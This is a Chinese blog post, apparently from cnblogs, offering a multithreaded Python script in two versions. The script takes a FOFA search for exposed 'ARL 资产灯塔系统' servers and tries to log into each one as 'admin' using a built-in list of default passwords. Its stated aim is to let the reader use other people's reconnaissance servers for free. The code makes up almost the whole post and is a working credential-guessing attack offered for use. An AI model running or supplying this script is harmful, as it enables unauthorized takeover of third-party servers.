---知识面决定攻击面---|
收藏闪存小组博问

sesmof

园龄:1年4个月粉丝:3关注:10

在任何系统下使用公网ARL灯塔(免搭建)

你是否还因没vps上的ARL灯塔而烦恼?
那就试试这个脚本
fofa:
title='资产灯塔系统'

'''
抓ARL灯塔
'''
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import threading
result=[]
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

class Bag:
    def __init__(self, url, username, passwd):
        self.username = username
        self.passwd = passwd
        self.url = f"{url}/api/user/login"
        self.headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
            "Accept": "application/json, text/plain, */*",
            "Accept-Language": "zh-CN,en-US;q=0.7,en;q=0.3",
            "Accept-Encoding": "gzip, deflate, br",
            "Content-Type": "application/json; charset=UTF-8",
            "Origin": "https://192.168.0.103:5003",
            "Sec-Fetch-Dest": "empty",
            "Sec-Fetch-Mode": "cors",
            "Sec-Fetch-Site": "same-origin",
            "Te": "trailers",
        }
        self.data = {
            "username": f"{username}",
            "password": f"{passwd}",
        }

    def send_bag(self):
        try:
            response = requests.post(self.url, json=self.data, headers=self.headers, verify=False)
            if response.text.find('{"message": "success", "code": 200,') != -1:
                return ['right', self.url, self.username, self.passwd]
        except:
            pass

def read_urls_from_file(urls_file_path):
    with open(urls_file_path, 'r') as file:
        for line in file.readlines():
            if line.strip():
                yield line.strip()

def test_url(url, passwds):
    a=0
    for passwd in passwds:
        response = Bag(url=url, passwd=passwd, username=username).send_bag()
        if response is not None:
            result.append(response)
            print('\n',response , '<-----------------------------------------------------------------')
            a=1
            break
    if a!=1:
        print('failed'+f'{url}'+'\r',end='')

if __name__ == "__main__":
    username = 'admin'
    passwds = ['admin123', 'honmashironeko', 'admin', 'arlpass', '114514', 'passwd123', 'password123', 'root']
    urls_file_path = '/root/weapons/XIN-SHOU/fofaHack.ARL-wudanshiturls.txt'

    threads = []
    for url in read_urls_from_file(urls_file_path):
        print(f'testing {url}'+'\r',end='')
        thread = threading.Thread(target=test_url, args=(url, passwds))
        threads.append(thread)
        thread.start()

    for thread in threads:
        thread.join()
print(result)

即兴编写,能达到目的,代码还需完善

补充适配无头url字典的代码:

'''
抓ARL灯塔
'''
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import threading
result=[]
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

class Bag:
    def __init__(self, url, username, passwd):
        self.username = username
        self.passwd = passwd
        self.url = f"{url}/api/user/login"
        self.headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
            "Accept": "application/json, text/plain, */*",
            "Accept-Language": "zh-CN,en-US;q=0.7,en;q=0.3",
            "Accept-Encoding": "gzip, deflate, br",
            "Content-Type": "application/json; charset=UTF-8",
            "Origin": "https://192.168.0.103:5003",
            "Sec-Fetch-Dest": "empty",
            "Sec-Fetch-Mode": "cors",
            "Sec-Fetch-Site": "same-origin",
            "Te": "trailers",
        }
        self.data = {
            "username": f"{username}",
            "password": f"{passwd}",
        }

    def send_bag(self):
        try:
            response = requests.post(self.url, json=self.data, headers=self.headers, verify=False)
            if response.text.find('token') != -1:
                return ['right', self.url, self.username, self.passwd]
        except:
            pass
def add_http_head(url):
    if not url.startswith('http'):
        return f'https://{url}'
def read_urls_from_file(urls_file_path):
    with open(urls_file_path, 'r') as file:
        for line in file.readlines():
            if line.strip():
                yield add_http_head(line.strip())

def test_url(url, passwds):
    a=0
    for passwd in passwds:
        response = Bag(url=url, passwd=passwd, username=username).send_bag()
        if response is not None:
            result.append(response)
            print('\n',response , '<-----------------------------------------------------------------')
            a=1
            break
    if a!=1:
        print('failed'+f'{url}'+'\r',end='')

if __name__ == "__main__":
    username = 'admin'
    passwds = ['admin123', 'honmashironeko', 'admin', 'arlpass', '114514', 'passwd123', 'password123', 'root']
    urls_file_path = '/root/weapons/SAO/ARLS-URL.TXT'

    threads = []
    for url in read_urls_from_file(urls_file_path):
        print(f'testing {url}'+'\r',end='')
        thread = threading.Thread(target=test_url, args=(url, passwds))
        threads.append(thread)
        thread.start()

    for thread in threads:
        thread.join()
print(result)

本文作者:sesmof

本文链接:https://www.cnblogs.com/sesmof/p/18301633

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   sesmof  阅读(99)  评论(1编辑  收藏  举报
点击右上角即可分享
微信分享提示
评论
收藏
关注
推荐
深色
回顶
收起
  1. 1 飘上月球,不死之烟 上海爱丽丝幻乐团
飘上月球,不死之烟 - 上海爱丽丝幻乐团
00:00 / 00:00
An audio error has occurred.